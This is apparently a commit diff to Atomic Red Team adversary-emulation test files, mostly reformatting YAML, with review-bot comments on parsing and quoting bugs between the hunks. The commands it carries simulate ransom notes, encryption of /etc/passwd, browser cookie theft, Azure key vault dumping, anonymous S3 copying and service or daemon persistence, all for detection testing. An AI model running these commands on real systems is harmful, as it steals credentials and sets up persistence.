prereq_command: | - which_ccencrypt=`which ccencrypt` - which_ccdecrypt=`which ccdecrypt` - if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi - get_prereq_command: | - (which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt) + - description: | + Finds where ccencrypt and ccdecrypt is located and copies input file + prereq_command: | + which_ccencrypt=`which ccencrypt` + which_ccdecrypt=`which ccdecrypt` + if [[ $USER == "root" ]]; then cp 
#{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi + get_prereq_command: | + (which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt) executor: name: bash elevation_required: false @@ -125,35 +126,35 @@ atomic_tests: description: | Uses openssl to encrypt a file supported_platforms: - - linux + - linux input_arguments: private_key_path: description: path to the private key - type: Path + type: path default: /tmp/key.pem public_key_path: description: path to the public key - type: Path + type: path default: /tmp/pub.pem encryption_bit_size: description: size of the bit of encryption - type: Integer + type: integer default: 2048 encrypted_file_path: description: path to the encrypted file - type: Path + type: path default: /tmp/passwd.zip input_file_path: description: path to the file that you want to encrypt - type: Path - default: /etc/passwd + type: path + default: /etc/passwd dependency_executor_name: bash dependencies: - - description: | - Finds where openssl is located - prereq_command: | - which_openssl=`which openssl` - get_prereq_command: | + - description: | + Finds where openssl is located + prereq_command: | + which_openssl=`which openssl` + get_prereq_command: | executor: name: bash elevation_required: false @@ -172,12 +173,12 @@ atomic_tests: https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ supported_platforms: - - windows + - windows executor: name: command_prompt - elevation_required: true - command: | + elevation_required: true + command: | echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - cleanup_command: | + cleanup_command: | del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 diff --git a/atomics/T1489/T1489.yaml b/atomics/T1489/T1489.yaml index de12c4b8..652ffffc 100644 --- a/atomics/T1489/T1489.yaml +++ b/atomics/T1489/T1489.yaml 
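Review bot: The description of `root_input_file_path` in the ccrypt test is now a multi-line plain scalar, with `user` continued on the line below `… if you are root`; YAML folds the continuation back with a space, so the value is unchanged, but a plain scalar that wraps is easy to break on the next edit (a stray `#` or a deeper indent silently changes or truncates it). Presumably the re-wrap comes from the YAML dumper's line-length limit; making the intent explicit with a block scalar, `description: >-` followed by the two wrapped lines, keeps the same value and survives reformatting. The executor `command` for this test lies outside the hunk.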
@@ -12,7 +12,7 @@ atomic_tests: input_arguments: service_name: description: Name of a service to stop - type: String + type: string default: spooler executor: command: | @@ -32,7 +32,7 @@ atomic_tests: input_arguments: service_name: description: Name of a service to stop - type: String + type: string default: spooler executor: command: | @@ -53,10 +53,9 @@ atomic_tests: input_arguments: process_name: description: Name of a process to kill - type: String + type: string default: spoolsv.exe executor: command: | taskkill.exe /f /im #{process_name} name: command_prompt - diff --git a/atomics/T1491.001/T1491.001.yaml b/atomics/T1491.001/T1491.001.yaml index 8760ca99..d1f1d253 100644 --- a/atomics/T1491.001/T1491.001.yaml +++ b/atomics/T1491.001/T1491.001.yaml 
@@ -10,78 +10,78 @@ atomic_tests: input_arguments: url_of_wallpaper: description: URL pointing to the image file you wish to set as wallpaper - type: Url + type: url default: https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png pointer_to_orginal_wallpaper: description: Full path to where a file containing the original wallpaper location will be saved - type: String + type: string default: $env:TEMP\T1491.001-OrginalWallpaperLocation wallpaper_location: description: Full path to where the downloaded wallpaper image will be saved - type: String + type: string default: $env:TEMP\T1491.001-newWallpaper.png executor: command: | - $url = "#{url_of_wallpaper}" - $imgLocation = "#{wallpaper_location}" - $orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper - $orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}" - $updateWallpapercode = @' - using System.Runtime.InteropServices; - namespace Win32{ - - public class Wallpaper{ - [DllImport("user32.dll", CharSet=CharSet.Auto)] - static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; - - public static void SetWallpaper(string thePath){ - SystemParametersInfo(20,0,thePath,3); - } - } - } - '@ - $wc = New-Object System.Net.WebClient - try{ - $wc.DownloadFile($url, $imgLocation) - add-type $updateWallpapercode - [Win32.Wallpaper]::SetWallpaper($imgLocation) - } - catch [System.Net.WebException]{ - Write-Host("Cannot download $url") - add-type $updateWallpapercode - [Win32.Wallpaper]::SetWallpaper($imgLocation) - } - finally{ - $wc.Dispose() - } + $url = "#{url_of_wallpaper}" + $imgLocation = "#{wallpaper_location}" + $orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper + $orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}" + $updateWallpapercode = @' + using System.Runtime.InteropServices; + namespace Win32{ + 
+ public class Wallpaper{ + [DllImport("user32.dll", CharSet=CharSet.Auto)] + static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; + + public static void SetWallpaper(string thePath){ + SystemParametersInfo(20,0,thePath,3); + } + } + } + '@ + $wc = New-Object System.Net.WebClient + try{ + $wc.DownloadFile($url, $imgLocation) + add-type $updateWallpapercode + [Win32.Wallpaper]::SetWallpaper($imgLocation) + } + catch [System.Net.WebException]{ + Write-Host("Cannot download $url") + add-type $updateWallpapercode + [Win32.Wallpaper]::SetWallpaper($imgLocation) + } + finally{ + $wc.Dispose() + } cleanup_command: | - $updateWallpapercode = @' - using System.Runtime.InteropServices; - namespace Win32{ - - public class Wallpaper{ - [DllImport("user32.dll", CharSet=CharSet.Auto)] - static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; - - public static void SetWallpaper(string thePath){ - SystemParametersInfo(20,0,thePath,3); - } - } - } - '@ - if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) { - $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}" - add-type $updateWallpapercode - [Win32.Wallpaper]::SetWallpaper($orgImg) - } - Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore - Remove-Item "#{wallpaper_location}" -ErrorAction Ignore + $updateWallpapercode = @' + using System.Runtime.InteropServices; + namespace Win32{ + + public class Wallpaper{ + [DllImport("user32.dll", CharSet=CharSet.Auto)] + static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; + + public static void SetWallpaper(string thePath){ + SystemParametersInfo(20,0,thePath,3); + } + } + } + '@ + if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) { + $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}" + add-type $updateWallpapercode + [Win32.Wallpaper]::SetWallpaper($orgImg) + } + Remove-Item 
"#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore + Remove-Item "#{wallpaper_location}" -ErrorAction Ignore name: powershell - name: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b description: | Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText. - + [SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection), [Grief Ransomware](https://redcanary.com/blog/grief-ransomware/), [Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27), @@ -95,12 +95,12 @@ atomic_tests: input_arguments: legal_notice_caption: description: Title of ransom message - type: String + type: string default: PYSA legal_notice_text: description: Body of ransom message - type: String - default: "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org" + type: string + default: "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org" executor: command: |- $orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption diff --git a/atomics/T1505.002/T1505.002.yaml b/atomics/T1505.002/T1505.002.yaml index a831ec5d..a2ccdea4 100644 --- a/atomics/T1505.002/T1505.002.yaml +++ b/atomics/T1505.002/T1505.002.yaml 
@@ -11,15 +11,15 @@ atomic_tests: input_arguments: class_factory: description: Class factory of transport agent. - type: String + type: string default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory dll_path: description: Path of DLL to use as transport agent. - type: Path + type: path default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll transport_agent_identity: description: Friendly name of transport agent once installed. - type: String + type: string default: Security Interop Agent dependencies: - description: | diff --git a/atomics/T1505.003/T1505.003.yaml b/atomics/T1505.003/T1505.003.yaml index 12effc47..fa527c58 100644 --- a/atomics/T1505.003/T1505.003.yaml +++ b/atomics/T1505.003/T1505.003.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: web_shell_path: description: The path to drop the web shell - type: String + type: string default: C:\inetpub\wwwroot web_shells: description: Path of Web Shell - type: Path + type: path default: PathToAtomicsFolder\T1505.003\src dependency_executor_name: powershell dependencies: diff --git a/atomics/T1505.004/T1505.004.yaml b/atomics/T1505.004/T1505.004.yaml index a0ac74a4..ccf81f78 100644 --- a/atomics/T1505.004/T1505.004.yaml +++ b/atomics/T1505.004/T1505.004.yaml @@ -14,13 +14,13 @@ atomic_tests: input_arguments: module_name: description: The name of the IIS module - type: String + type: string default: DefaultDocumentModule_Atomic dll_path: description: The path to the DLL to be loaded type: path default: '%windir%\system32\inetsrv\defdoc.dll' - dependency_executor_name: powershell + dependency_executor_name: powershell dependencies: - description: | IIS must be installed in order to add a module to IIS. 
@@ -48,13 +48,13 @@ atomic_tests: input_arguments: module_name: description: The name of the IIS module - type: String + type: string default: DefaultDocumentModule_Atomic dll_path: description: The path to the DLL to be loaded type: path default: '%windir%\system32\inetsrv\defdoc.dll' - dependency_executor_name: powershell + dependency_executor_name: powershell dependencies: - description: | IIS must be installed in order to add a module to IIS. @@ -68,4 +68,4 @@ atomic_tests: New-WebGlobalModule -Name #{module_name} -Image #{dll_path} cleanup_command: | Remove-WebGlobalModule -Name #{module_name} - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1526/T1526.yaml b/atomics/T1526/T1526.yaml index 8511f692..a206fbd6 100644 --- a/atomics/T1526/T1526.yaml +++ b/atomics/T1526/T1526.yaml @@ -12,20 +12,20 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az output_directory: description: Directory to output results to - type: String - default: $env:temp\T1526Test1 + type: string + default: $env:temp\T1526Test1 subscription_name: description: Azure subscription name to scan - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1528/T1528.yaml b/atomics/T1528/T1528.yaml index c3d0c5c1..03d8e771 100644 --- a/atomics/T1528/T1528.yaml +++ b/atomics/T1528/T1528.yaml 
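Review bot: In the T1526 hunk the `username` and `subscription_name` arguments lose their explicit `default: null` in favour of a bare `default:`, and the T1528 hunk does the same for `username` and `subscription_id`. Both forms parse to null, so nothing changes at load time, but a bare empty value is what yamllint's `empty-values` rule flags and it reads as an accidental omission rather than a deliberate "must be supplied" for account and subscription identifiers. Keeping `default: null` (or `default: ""` if the runner expects a string there; I cannot tell from the diff which the schema wants) states the intent. This applies to the new side of both hunks.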
@@ -4,27 +4,27 @@ atomic_tests: - name: Azure - Dump All Azure Key Vaults with Microburst auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea description: |- - Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file. - See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/ + Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file. + See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/ supported_platforms: - iaas:azure input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az output_file: description: File to dump results to - type: String + type: string default: $env:temp\T1528Test1.txt subscription_id: description: Azure subscription id to search - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml index 34927fa8..4bde7a34 100644 --- a/atomics/T1529/T1529.yaml +++ b/atomics/T1529/T1529.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: timeout: description: Timeout period before shutdown (seconds) - type: Integer + type: integer default: 1 executor: command: | @@ -26,7 +26,7 @@ atomic_tests: input_arguments: timeout: description: Timeout period before restart (seconds) - type: Integer + type: integer default: 1 executor: command: | @@ -43,7 +43,7 @@ atomic_tests: input_arguments: timeout: description: Time to restart (can be minutes or specific time) - type: String + type: string default: now executor: command: | 
@@ -60,7 +60,7 @@ atomic_tests: input_arguments: timeout: description: Time to shutdown (can be minutes or specific time) - type: String + type: string default: now executor: command: | diff --git a/atomics/T1530/T1530.yaml b/atomics/T1530/T1530.yaml index 936e55bd..9c3e1c84 100644 --- a/atomics/T1530/T1530.yaml +++ b/atomics/T1530/T1530.yaml @@ -11,16 +11,16 @@ atomic_tests: input_arguments: base: description: Azure blob keyword to enumerate (Example, storage account name) - type: String + type: string default: secure output_file: description: File to output results to - type: String + type: string default: $env:temp\T1530Test1.txt wordlist: - description: File path to keywords for search permutations - type: String - default: $env:temp\permutations.txt + description: File path to keywords for search permutations + type: string + default: $env:temp\permutations.txt dependency_executor_name: powershell dependencies: - description: | @@ -53,19 +53,19 @@ atomic_tests: input_arguments: base_name: description: Azure storage account name to test - type: String + type: string default: T1530Test2 output_file: description: File to output results to - type: String + type: string default: $env:temp\T1530Test2.txt container_name: description: Container name to search for (optional) - type: String + type: string default: blob_name: description: Blob name to search for (optional) - type: String + type: string default: executor: command: | @@ -81,7 +81,7 @@ atomic_tests: cleanup_command: | remove-item #{output_file} -erroraction silentlycontinue name: powershell -- name: AWS - Scan for Anonymous Access to S3 +- name: AWS - Scan for Anonymous Access to S3 auto_generated_guid: 979356b9-b588-4e49-bba4-c35517c484f5 description: | Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder. 
@@ -90,24 +90,24 @@ atomic_tests: input_arguments: s3_bucket_name: description: Name of the bucket - type: String + type: string default: "redatomic-test2" dependencies: - - description: | - Check if ~/.aws/credentials file has a default stanza is configured - prereq_command: | - cat ~/.aws/credentials | grep "default" - aws s3api create-bucket --bucket #{s3_bucket_name} - aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json - touch /tmp/T1530.txt - aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name} - get_prereq_command: | - echo Please install the aws-cli and configure your AWS default profile using: aws configure + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws s3api create-bucket --bucket #{s3_bucket_name} + aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json + touch /tmp/T1530.txt + aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name} + get_prereq_command: | + echo Please install the aws-cli and configure your AWS default profile using: aws configure executor: command: | - aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name} + aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name} cleanup_command: | - aws s3 rb s3://#{s3_bucket_name} --force - rm -rf /tmp/#{s3_bucket_name} + aws s3 rb s3://#{s3_bucket_name} --force + rm -rf /tmp/#{s3_bucket_name} name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1531/T1531.yaml b/atomics/T1531/T1531.yaml index 99b568e0..8b87251d 100644 --- a/atomics/T1531/T1531.yaml +++ b/atomics/T1531/T1531.yaml 
@@ -11,15 +11,15 @@ atomic_tests: input_arguments: user_account: description: User account whose password will be changed. - type: String + type: string default: AtomicAdministrator new_user_password: description: Password to use if user account must be created first - type: String + type: string default: User2ChangePW! new_password: description: New password for the specified account. - type: String + type: string default: HuHuHUHoHo283283@dJD executor: command: | @@ -38,11 +38,11 @@ atomic_tests: input_arguments: new_user_password: description: Password to use if user account must be created first - type: String + type: string default: User2DeletePW! user_account: description: User account to be deleted. - type: String + type: string default: AtomicUser executor: command: | @@ -67,15 +67,15 @@ atomic_tests: input_arguments: super_user: description: Account used to run the execution command (must include domain). - type: String + type: string default: 'domain\super_user' super_pass: description: super_user account password. - type: String + type: string default: "password" remove_user: description: Account to remove from domain admins. - type: String + type: string default: "remove_user" executor: command: | diff --git a/atomics/T1539/T1539.yaml b/atomics/T1539/T1539.yaml index ce85d10d..9215dbe7 100644 --- a/atomics/T1539/T1539.yaml +++ b/atomics/T1539/T1539.yaml @@ -1,5 +1,5 @@ attack_technique: T1539 -display_name: Steal Web Session Cookie +display_name: Steal Web Session Cookie atomic_tests: - name: Steal Firefox Cookies (Windows) auto_generated_guid: 4b437357-f4e9-4c84-9fa6-9bcee6f826aa @@ -12,11 +12,11 @@ atomic_tests: input_arguments: sqlite3_path: description: Path to sqlite3 - type: Path + type: path default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies - type: Path + type: path default: $env:temp\T1539FirefoxCookies.txt dependency_executor_name: powershell dependencies: 
@@ -29,11 +29,11 @@ atomic_tests: Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force executor: command: | - stop-process -name "firefox" -force -erroraction silentlycontinue - $CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite" - "select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}" - cleanup_command: | - remove-item #{output_file} -erroraction silentlycontinue + stop-process -name "firefox" -force -erroraction silentlycontinue + $CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite" + "select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}" + cleanup_command: | + remove-item #{output_file} -erroraction silentlycontinue name: powershell elevation_required: false - name: Steal Chrome Cookies (Windows) @@ -48,15 +48,15 @@ atomic_tests: input_arguments: cookie_db: description: Filepath for Chrome cookies database - type: String + type: string default: $env:localappdata\Google\Chrome\User Data\Default\Network\Cookies sqlite3_path: description: Path to sqlite3 - type: Path + type: path default: $env:temp\sqlite-tools-win32-x86-3380200\sqlite3.exe output_file: description: Filepath to output cookies - type: Path + type: path default: $env:temp\T1539ChromeCookies.txt dependency_executor_name: powershell dependencies: 
@@ -69,9 +69,9 @@ atomic_tests: Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force executor: command: | - stop-process -name "chrome" -force -erroraction silentlycontinue - "select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}" - cleanup_command: | - remove-item #{output_file} + stop-process -name "chrome" -force -erroraction silentlycontinue + "select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}" + cleanup_command: | + remove-item #{output_file} name: powershell elevation_required: false diff --git a/atomics/T1543.001/T1543.001.yaml b/atomics/T1543.001/T1543.001.yaml index 128f26fc..3ada90e1 100644 --- a/atomics/T1543.001/T1543.001.yaml +++ b/atomics/T1543.001/T1543.001.yaml @@ -9,12 +9,12 @@ atomic_tests: - macos input_arguments: plist_filename: - description: filename - type: String + description: filename + type: string default: com.atomicredteam.plist path_malicious_plist: description: Name of file to store in cron folder - type: String + type: string default: $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist dependency_executor_name: bash dependencies: 
@@ -40,19 +40,19 @@ atomic_tests: This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. supported_platforms: - - macos + - macos input_arguments: script_location: description: evil plist location - type: Path + type: path default: $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist script_destination: description: Path where to move the evil plist - type: Path + type: path default: /etc/emond.d/rules/atomicredteam_T1053_004.plist empty_file: description: Random name of the empty file used to trigger emond service - type: String + type: string default: randomflag executor: name: bash @@ -60,6 +60,6 @@ atomic_tests: command: | sudo cp #{script_location} #{script_destination} sudo touch /private/var/db/emondClients/#{empty_file} - cleanup_command: | + cleanup_command: |- sudo rm #{script_destination} - sudo rm /private/var/db/emondClients/#{empty_file} \ No newline at end of file + sudo rm /private/var/db/emondClients/#{empty_file} diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index 393c59b4..d97d5703 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml 
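Review bot: The emond test's `cleanup_command` is changed to `|-` while every other `cleanup_command` touched by this commit keeps `|`, so this is the only block scalar whose trailing newline is stripped. The strip most likely mirrors the previous file ending without a final newline (the `\ No newline at end of file` marker is visible on the old side), which means the scalar's value round-trips unchanged, and a missing trailing newline is unlikely to matter when bash runs the script. If that was not the intent, `cleanup_command: |` would make the block consistent with the sibling tests.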
@@ -10,35 +10,35 @@ atomic_tests:
 input_arguments:
 systemd_service_path:
 description: Path to systemd service unit file
- type: Path
+ type: path
 default: /etc/systemd/system
 systemd_service_file:
 description: File name of systemd service unit file
- type: String
+ type: string
 default: art-systemd-service.service
 execstoppost_action:
 description: ExecStopPost action for Systemd service
- type: String
+ type: string
 default: /bin/touch /tmp/art-systemd-execstoppost-marker
 execreload_action:
 description: ExecReload action for Systemd service
- type: String
+ type: string
 default: /bin/touch /tmp/art-systemd-execreload-marker
 execstart_action:
 description: ExecStart action for Systemd service
- type: String
+ type: string
 default: /bin/touch /tmp/art-systemd-execstart-marker
 execstop_action:
 description: ExecStop action for Systemd service
- type: String
+ type: string
 default: /bin/touch /tmp/art-systemd-execstop-marker
 execstartpre_action:
 description: ExecStartPre action for Systemd service
- type: String
+ type: string
 default: /bin/touch /tmp/art-systemd-execstartpre-marker
 execstartpost_action:
 description: ExecStartPost action for Systemd service
- type: String
+ type: string
 default: /bin/touch /tmp/art-systemd-execstartpost-marker
 executor:
 command: |
@@ -73,14 +73,14 @@ atomic_tests: This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. supported_platforms: - - linux + - linux dependencies: - - description: | - System must be Ubuntu ,Kali OR CentOS. - prereq_command: | - if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; - get_prereq_command: | - echo Please run from Ubuntu ,Kali OR CentOS. + - description: | + System must be Ubuntu ,Kali OR CentOS. + prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; + get_prereq_command: | + echo Please run from Ubuntu ,Kali OR CentOS. executor: name: bash elevation_required: true @@ -111,4 +111,3 @@ atomic_tests: systemctl disable T1543.002 rm -rf /etc/init.d/T1543.002 systemctl daemon-reload - diff --git a/atomics/T1543.003/T1543.003.yaml b/atomics/T1543.003/T1543.003.yaml index cd187437..cac19d47 100644 --- a/atomics/T1543.003/T1543.003.yaml +++ b/atomics/T1543.003/T1543.003.yaml @@ -9,7 +9,7 @@ atomic_tests: and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. supported_platforms: - - windows + - windows executor: name: command_prompt 
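Review bot: The re-indented `prereq_command` in the T1543.002 dependency (`@@ -73,14 +73,14 @@`) ends in `exit /b 0` / `exit /b 1`, which is cmd.exe syntax; under bash or sh `exit /b` aborts with "numeric argument required" and a non-zero status, so the OS check reports the prerequisite as unmet on Ubuntu, Kali and CentOS alike and the test never gets past it. The tail should read `then exit 0; else exit 1; fi`. Quoting the substitutions while here, e.g. `[ -n "$(grep -i ID=ubuntu /etc/os-release)" ]`, avoids relying on word splitting of the unquoted `$(...)` for the truth value. The test's `dependency_executor_name` is outside this hunk, so this assumes the same bash executor named below the dependencies.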
@@ -26,26 +26,26 @@ atomic_tests: Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. supported_platforms: - - windows + - windows input_arguments: binary_path: description: Name of the service binary, include path. - type: Path + type: path default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe service_name: description: Name of the Service - type: String + type: string default: AtomicTestService_CMD dependency_executor_name: powershell dependencies: - - description: | - Service binary must exist on disk at specified location (#{binary_path}) - prereq_command: | - if (Test-Path #{binary_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + - description: | + Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: | + if (Test-Path #{binary_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: command_prompt elevation_required: true 
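Review bot: In the re-indented dependency block, `#{binary_path}` is passed to `Test-Path` unquoted (`if (Test-Path #{binary_path}) {exit 0} else {exit 1}`) while the `Invoke-WebRequest ... -OutFile "#{binary_path}"` line right after it quotes the same value; with a `PathToAtomicsFolder` that contains a space, `Test-Path` receives a second positional argument and errors rather than returning true, so the prerequisite is treated as unmet even when the binary is on disk. `if (Test-Path "#{binary_path}") {exit 0} else {exit 1}` matches the quoting already used in `get_prereq_command`. The same unquoted `Test-Path` is in the second T1543.003 hunk (`@@ -58,29 +58,29 @@`) and in the T1546.009 hunk (`Test-Path #{dll_path}`) further down this page.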
@@ -58,29 +58,29 @@ atomic_tests: - name: Service Installation PowerShell auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 description: | - Installs A Local Service via PowerShell. - Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. + Installs A Local Service via PowerShell. + Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. supported_platforms: - - windows + - windows input_arguments: binary_path: description: Name of the service binary, include path. - type: Path + type: path default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe service_name: description: Name of the Service - type: String + type: string default: AtomicTestService_PowerShell dependency_executor_name: powershell dependencies: - - description: | - Service binary must exist on disk at specified location (#{binary_path}) - prereq_command: | - if (Test-Path #{binary_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" + - description: | + Service binary must exist on disk at specified location (#{binary_path}) + prereq_command: | + if (Test-Path #{binary_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" executor: name: powershell elevation_required: true 
@@ -95,7 +95,7 @@ atomic_tests: auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 description: | It's running Dll as service to emulate the TinyTurla backdoor - + [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html) supported_platforms: - windows diff --git a/atomics/T1543.004/T1543.004.yaml b/atomics/T1543.004/T1543.004.yaml index ec89c31f..b347932c 100644 --- a/atomics/T1543.004/T1543.004.yaml +++ b/atomics/T1543.004/T1543.004.yaml @@ -6,15 +6,15 @@ atomic_tests: description: | Utilize LaunchDaemon to launch `Hello World` supported_platforms: - - macos + - macos input_arguments: plist_filename: - description: filename - type: String + description: filename + type: string default: com.atomicredteam.plist path_malicious_plist: description: Name of file to store in cron folder - type: String + type: string default: $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist dependency_executor_name: bash dependencies: diff --git a/atomics/T1546.001/T1546.001.yaml b/atomics/T1546.001/T1546.001.yaml index e1e51bd8..ecc67d43 100644 --- a/atomics/T1546.001/T1546.001.yaml +++ b/atomics/T1546.001/T1546.001.yaml @@ -12,22 +12,22 @@ atomic_tests: input_arguments: target_extension_handler: description: txtfile maps to notepad.exe - type: Path + type: path default: txtfile extension_to_change: description: File Extension To Hijack - type: String + type: string default: .hta #Adding additional input arguement below for new cleanup command original_extension_handler: - description: 